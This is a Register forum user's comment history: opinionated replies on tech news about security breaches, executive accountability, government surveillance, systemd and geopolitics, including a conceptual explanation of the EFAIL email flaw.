* Posts by Kabukiwookie

123 posts • joined 8 Dec 2017


Vengeful sacked IT bod destroyed ex-employer's AWS cloud accounts. Now he'll spent rest of 2019 in the clink


Re: Voova should take some heat here...

But, but it's in the cloud.



Maybe this guy is completely innocent...

Huawei CFO poutine cuffs by Canadian cops after allegedly busting sanctions on Iran


Re: China is not a democracy

China can do all those things and a lot worse. So whatever you might think of western democracy, it's a hell of a lot better on the rights department then China.

On the other hand, China is not the one shouting from the roof tops that they're the protector if Freedom and Democracy(tm) either.

Russia: We did not hack the US Democrats. But if we did, we're immune from prosecution... lmao


Re: They are Russian

It's one thing to argue that the Western Allies diplomatic failure in Eastern Europe forced the Soviets to make their own arrangements with Germany. It's another to justify helping to arm the German war machine, while they were fighting Britain and France - particularly stupid given that it was likely to be turned on them next.

It's just as dumb as the British secretly supporting the fascists in Spain during their civil war, while depriving the republicans of the arms to defend themselves. This whole diplomacy thingy is based on opportunism, and that goes for all parties, the western 'Allies' were doing exactly the same. If my future adversary is busy fighting someone else than me, that will give me time to get own house in order when it's my time.

Please spare me the 'holier than thou' attitude.


Re: Wikileaks and Trump?

There is the evidence

Really? Please post some links that do not point to people repeating non-verifiable 'news' from people who have their information from 'reliable sources' or a TLA stating they have 'high confidence' such a thing happened without actually disclosing any real information beyond 'trust me we know, but we can't show you the evidence, because of... eh National Security, yep. National Security'. The very same TLAs that had 'high confidence' about WMDs in Iraq.

I know how many examples to actual evidence you can produce; exactly zero.

It's hearsay and people repeating hearsay and more people thinking that as long as enough people repeat it, it becomes true.

Black Helicopters

Re: Wikileaks and Trump?

It's possible Assange may have thought he had a deal with Trump, but - like many others before him - he's since realised what that's worth.

Now I am confused, who the conspiracy theorists are supposed to be again?

Is it the ones that think that Assange will be picked up by the US govt, taking into account previous actions from that particular govt like breaking international law by forcing the landing of a diplomatic airplane carrying the Bolivian president, because there was a chance that Edward Snowden was on board... along with an extensive track record of false flags to start conflicts and 'interventions' by toppling foreign democratically elected governments?


Is it the ones peddling the Trump colluded with Wikileaks and Russia, for which we can show the following overwhelming proof ... >sound of crickets<

Nixon should have thought of blaming the Russians when Woodward and Bernstein investigated Watergate. If Watergate would have happened now, both journalists would probably in incarcerated, instead of receiving a Pullitzer.

Guess who's back, back again? China's back, hacking your friends: Beijing targets American biz amid tech tariff tiff


It sounds like many companies have been paying lip service to the security around their IP

That's because non-technical people have no clue about IT and are not willing to spend money on what appears to work 'just fine' automagically. The whole premise of securing a physical gold storage facility is much easier to understand than setting up proper user authentication.

I am encountering more and more that even people working in IT seem to know the 'magic incantations' to get something done, but have no idea what those incantations actually do, nor what any side effect of those incantations may be. On top of that, they often don't even seem to be actually interested in anything except 'making stuff work'.

Bloodbath as Broadcom slashes through CA Technologies personnel


Re: As ye sow, so shall ye reap


CA, where good software goes to die.

DXC: Everything is going to plan, too well in fact... we've chopped so many staff, our IT projects are now behind


Re: hahahahahahahahahaha - pull the other one, it's got bells on.

lets see what we get told on Thursday.......

Working for DXC eh? You have my sympathy.

Dutch cops hope to cuff 'hundreds' of suspects after snatching server, snooping on 250,000+ encrypted chat texts


Re: New???

Although I agree with the general sentiment, they also could have just grabbed the customer list and listened in on their conversations in the 'traditional' way using a directional microphone and a court order to monitor a person suspected of committing a crime.

This wholesale grab of all data just rubs me the wrong way.

Someone like Snowden could be using this service and with the dutch government bending over backwards to the US interests usually, it wouldn't surprise me if this would be abused.

Russian computer failure on ISS is nothing to worry about – they're just going to turn it off and on again


Re: Which computers is this?

Moving to a version that uses systemd can hardly be called an 'upgrade'.

GitHub.com freezes up as techies race to fix dead data storage gear


Re: If Only....

The issue is probably human error. Probably a misconfiguration or alerts that were ignored or not received at all, because infrastructure is easy and any developer who can bang two lines of Java together automatically knows everything there is to know about infrastructure as well.

That's the Devops way.

Linux kernel 'give me root, now' security hole sighted, dubbed 'Mutagen Astronomy'


Re: Thanks for clarifying.

Sometimes small words, talking slowly and repetition isn't enough to guarantee understanding.

That's because you forgot to add 'louder' to that list...

'World's favorite airline' favorite among hackers: British Airways site, app hacked for two weeks


Re: We take the protection of our customers’ data very seriously.

fining a company some large percentage of their global takings is a pretty decent incentive.

Fines will be borne by the company, which will translate it into their cost. This means that with the large oligopolies that we're currently having, the customer eventually pays for the f**k-ups of poor management.

I am not saying CTOs should immediately go to jail without any investigation, but if their Security Officer has been warning the CTO time and time again that things need to be improved and the CTO doesn't act, the CTO did not perform his/her 'due diligence'. This should be at the very least a fire-able offence without pay / golden parachute.

The issue I have with this is that even if this happens (it does not), that incompetent previous C-level manager will happily start working somewhere else at the same level, due to his golf-buddies and f**k things up there.

Jail time seems to be the only way to actually get the message across. It doesn't even have to be years (I am actually against long incarceration), but even a few months being deprived of their freedom will quickly change not only their perception of the seriousness of the job, it will also change the perception of the next board looking to hire C-level managers.

I have no problem with competent managers being compensated properly. I have a problem with bumbling fools being elevated above their capabilities, f**king up things for all employees in the company, then move on to the next one using their golden parachute.


Re: We take the protection of our customers’ data very seriously.

Now, if the *developer* was to go to jail for errant and grossly negligent practices (i.e. using off-the-shelf code and libraries, externally hosted or not, with zero understanding or care of the potential implications), then perhaps these f**k-ups wouldn't happen at all.

Most of these f**k-ups only happen, because with every IT project, corners are being cut to meet arbitrary dead-lines (often linked with bonuses for management for finishing early/under budget).

As it stands we have a market flooded by f**k-ups who think they're able to manage a project, who are paid well over £600/day, but are too moronic to listen to the highly paid experts when they tell them not to cut any corners. Only a poor crafts-man blames his tools.


Re: We take the protection of our customers’ data very seriously.

If you somehow think imposing this level of penalty would magically make everyone write every line of code from scratch, including the OS, and CPU microcode, to ensure every single byte has been thoroughly inspected, then you misunderstand how business works.

Of course it would would not magically happen, it would require real work. Things 'magically happen' because someone else will take care of it is the current way of thinking, where C-level management is absolved from any wrong-doing, because they're 'not able' to control what everyone else in the company is doing.

The key term here is 'due diligence'. Right now a lot of top management has no interest in ensuring they do a good job, since they are able to hide behind the excuse that they can't control what's happening on the lower rungs in the company.

misunderstand how business works.

I understand very well how businesses (and their internal politics) currently work and I also understand quite well what it would take to make them work well. You however don't seem to understand human nature.

Without an incentive to actually get off their ass, nothing will happen. Since larger and larger carrots don't seem to work, maybe it's time to apply the stick.


Re: We take the protection of our customers’ data very seriously.

No-one in their right mind would take a CTO job if this was the case.

You mean, nobody who doesn't know anything about security, how to enforce it and check that subordinates are indeed implementing said security would take the job.

And that's exactly the purpose.

Someone who cannot ensure that subordinates are doing what they're supposed to be doing should not be in any position of power. C-level management requires a person to have leadership skills, not being best golf-buddies with members of the board.


Re: We take the protection of our customers’ data very seriously.

We take the protection of our customers’ data very seriously.

They just leave out the bit ', but not enough to spend any serious money on it, since damage control if something happens is still cheaper for us than actually making sure your data is secure'.

These things will not change until C-level management is made directly responsible if things like this go wrong.

Data breach? CTO goes to jail.

Problem will fix itself within the next 6 months.

No, eight characters, some capital letters and numbers is not a good password policy



This is good advice:



Re: Over Your Head

This is why any Security Officer should be reporting directly to either the CEO and/or board of directors.

What usually happens is that the person responsible for security winds up attempting to shove shit uphill,

When's a backdoor not a backdoor? When the Oz government says it isn't


Re: Question:

Simple. Alice goes to jail or gets find $50,000.

Facebook's security boss is offski. Not to worry, it has 'embedded security' in all divisions


Re: A great start

My thoughts exactly.

What are the chances that any of the embedded security people gets cut off at the knees when complaining about a security issue that needs to be fixed that endangers the delivery date of a new feature?

Without a direct connection to C-level management, any push for security will be doomed to fail.

Bank on it: It's either legal to port-scan someone without consent or it's not, fumes researcher


Re: They are running code in my machine without my explicit consent for their own benefit...

Law supersedes any wording in private contracts if the private contract breaks the law.

FBI boss: We went to the Moon, so why can't we have crypto backdoors? – and more this week


Re: Eggs out of pancakes

Literally, the signal-to-noise of what they want plummets the second that you capture ordinary people in the loop

That presumes that the real reason is an attempt to capture the 'bad guys'. Problem with that again is thay the definition of 'bad guys'is constantly shifting.

US voting systems (in Oregon) potentially could be hacked (11 years ago) by anybody (in tech support)


Re: Security through obscurity?

It's Symantec, did you have any other expectation?

Russia's national vulnerability database is a bit like the Soviet Union – sparse and slow


Re: Two Russia cyber stories ..

Can't imagine why anyone would have a negative view of Putin

It's just that a lot of people are tired as fsck about articles with a lot of whataboutery. For some reason, you don't see similar articles about US run sites like CERT, which for instance completely lacks any mention of where Student originates from (who'd have thunk it), but you don't see articles being written pointing this out (and that's good, because it would be just as useful as an article pointing out that water is wet).

Everybody already knows that each government has their own intelligence machine and their own political motivations to point out what their 'enemies' are doing because they're evil.

Please keep technical articles technical.

And btw; insinuating that anyone complaining about this sort of this is a putinbot is so last year.

AAAAAAAAAA! You'll scream when you see how easy it is to pwn unpatched HPE servers


Re: Home-written HTTP servers

That's why I always use my Bash HTTP Server.


Banks told: Look, your systems WILL fail. What is your backup plan?


stopping free banking for the general public.

Which part of the planet do you live where the general public gets 'free banking'?


Re: Having backup plans is good.

Management listening to their SMEs regarding what are best practices is essential.

The problem is usually cutting corners to meet ridiculous arbitrary project deadlines.

Another staffer at mega-hacked Equifax slapped with insider trading rap


Re: "... charged with insider trading – and has promised to pay back his alleged ill-gotten gains."

Only if you're C-level management.

On Kaspersky’s 'transparency tour' the truth was clear as mud


Re: Seriously?

if you don't understand the difference between a freely elected government and a government ran by a pseudo-dictatorship which invades a peaceful nation and runs hundreds of thousands of people out of their home at gunpoint.. then I believe you have a lot of research and self-reflection to do.

Indeed, the false choice in the US between a turd-sandwich and a shit-bagle can't actually be called a democracy.

Along with their lang-standing tradition of overthrowing democratically elected governments in other countries they don't like, they should be stripped of their veto power in the UN.

Or is that not exactly what you had in mind?

From here on, Red Hat's new GPLv2 software projects will have GPLv3 cure for license violators


Slippery slope?

Not sure what the 'cure' term is in GPLv3, but while in this extension the time in which a licence breach can be fixed in 30-60 days (if caught at all).

What's stopping all the proponents for this addition to GPLv2 to slowly start extending this 'cure' term to 144 years?

♬ Finland, Finland, Finland, the country for new cloud DCs ♬


Use of public infrastructure

Aside from the fact that you're still giving your data to a US company, I hope the Finnish government is actually taxing Google, instead of giving ridiculous tax breaks.

Google is using the highly skilled workforce and public infrastructure, which is all paid for through taxes. At the very least they should contribute to Finnish society in the form of taxes, instead of leeching off of public infrastructure paid for by Finnish citizens, while moving profits to a tax haven.

Internet luminaries urge EU to kill off automated copyright filter proposal


Re: Invest in hard drives

EVERY rightsholder supply free copies (or hashes) of EVERY copyrighted work to EVERY Web site?

Free copies? No, not free. Anyone who's required to implement these measures can probably buy a solution with a hit ratio of 1%, with a forced subscription model to ensure the signature database is updated at regular intervals.

June 2018, and Windows Server can be pwned with a DNS request


Maybe MS can find some better code in Github, they can't seem to write anything that's not severely broken themselves.

Microsoft commits: We're buying GitHub for $7.5 beeeeeeellion


Re: Aladdin

They'll want to monetise it somehow

They'll have access to lots and lots of private repos, full of IP of companies doing software development.


Re: Worst thing: M$FT has now full access to our PRIVATE REPOS!!

Why else do you think MS would pay 7.5 billion USD?

This'll teach you to use any service that's owned by a US company.

With the rise of huge mega corps in the US, your data is not safe if it's stored with any US company. Even if the data is not directly stored in the US.

Stop shooting yourself in the foot and go somewhere that does take privacy seriously.

FBI fingers North Korea for two malware strains


Re: Credibility

Compulsive liars, need to prove they're not lying this time.

Interestingly, this was immediately attributed to North Korea, while if you check for Stuxnet on the same site, there's not a single link that implicates the US and/or Israel.

For some reason it looks like 'technical' statements from US Cert are highly politicised, and that should already be a reason to take anything they say with a grain of salt.

Internet engineers tear into United Nations' plan to move us all to IPv6


UN has pretty much been crippled by politics and made meaningless for a long time.

Yes it has, but the value of the UN and active participation is seriously hampered by the few countries that have 'veto' rights. This essentially means that as a non-veto country the only way you can pass any significant changes is if you make sure any proposal you want to pass is in the interest of the countries that do have veto rights.

The only way to fix this is to remove veto rights completely.

GCHQ bod tells privacy advocates: Most of our work is making sure we operate within the law


Re: "If you whack governments on privacy it will only drive the vulnerability market."

ruthless but selfish minorities.

Of course, if you look at history, it's always the minority groups with no power who abuse said lack of power.

Some people who see 'evil terrorists' in every nook and cranny, don't seem to understand how power corrupts selfish humans who should be working for the good of general population.

Folks are shocked – shocked – that CIA-backed Amazon is selling face-recog tech to US snoops, cops


All your data are belong to us

CIA-backed Amazon is selling face-recog tech to US snoops, cops

So what would be the chance of all data stored in the Amazon 'cloud' are actively being harvested by the CIA or any of the other TLAs?

US Congress mulls expanding copyright yet again – to 144 years


Re: Copyright extensions need to stop

Not only this, but copyright should only be given to natural persons, not corporations.

Agile development exposed as techie superstition


Re: Agile is b*llocks. Any non-idiot knows this.

'using the cloud' is nothing more than putting your balls in someone else's vice and hoping they know which way to twist the handle,

Utter brilliant; I'll definitely be ripping off your comment and will randomly throwing it into polite conversation.

Software development slow because 'Most of our ideas suck'


"release now and download updates/fixes later

You mean make customers buy DLCs later, once they're already committed.


"Most of our ideas suck," he said, attributing the quote to software consultant Jeff Patton (though any cynic, unbidden, will say as much).

"But some of them are amazing," he added. "If we can try enough of these ideas out, we can play a numbers game. We can find that ideas that will really help our customers."

Isn't this essentially the same idea that if you put enough monkeys in a room with typewriters that eventually one will create a master piece?


So what does that say about developers that are proponents of this idea?


Re: Precious

After reading that line I thought this was a SystemD article for a short while.

S/MIME artists: EFAIL email app flaws menace PGP-encrypted chats


Re: Am I missing something?

Surely they need full access to the target users computer not just the target's email account.

No, just having an email file itself allows an attacker to modify it, resend it and have (part of) the encrypted content fed back to the attacker as a URL that attempts to connect to an HTTP capable service owned by the attacker, due to the way that some email clients handle poorly formatted HTML in emails.

This is however only possible if the email client actively connects to URLs embedded in emails to retrieve content and the attacker must already have access to the emails, which mean either access to a user's account or access to a mail server.

The main group at risk of this, may be whistle blowers and political activists targeted by nations states who have access to email servers that contain a copy of the mail with encrypted content already and then only if they are using one of the affected email clients that allow retrieval of dynamic content in HTLM formatted mail.

Home Office admits it sent asylum seeker’s personal info to the state he was fleeing


Re: AC AC Cognitive Dissonance

why should the US burden itself by taking refugees who are unskilled from "sh*thole" countries - such as Haiti 

Maybe because the US is one of the greatest 'contributors' of turning countries into 'shitholes'. Either by bombing them back to the stone age or overthrowing democratically elected governments, because their interests conflict with the interests of the US.

You love Systemd – you just don't know it yet, wink Red Hat bods


Re: Spherical wheel is superior.

I do know that I never saw a non-distribution provided init script that handled correctly the basic of corner cases – service already running

This only shows that you don't have much real life experience managing lots of hosts.

like application double forking when it shouldn't

If this is a problem in the init script, this should be fixed in the init script. If this is a problem in the application itself, it should be fixed in the application, not worked around by the init mechanism. If you're suggesting the latter, you should not be touching any production box.

"La, la, la, sysv is working fine on my machine, thankyouverymuch" is not what you can call "participating in discussion".

Shoving down systemd down people's throat as a solution to a non-existing problem, is not a discussion either; it is the very definition of 'my way or the highway' thinking.

now in the real world, people that have to deal with init systems on daily basis

Indeed and having a bunch of sub-par developers, focused on the 'year of the Linux desktop' to decide what the best way is for admins to manage their enterprise environment is not helping.

"the dogs may bark, but the caravan moves on"

Indeed. It's your way or the highway; I thought you were just complaining about the people complaining about systemd not wanting to have a discussion, while all the while it's systemd proponents ignoring and dismissing very valid complaints.


Biting the hand that feeds IT © 1998–2019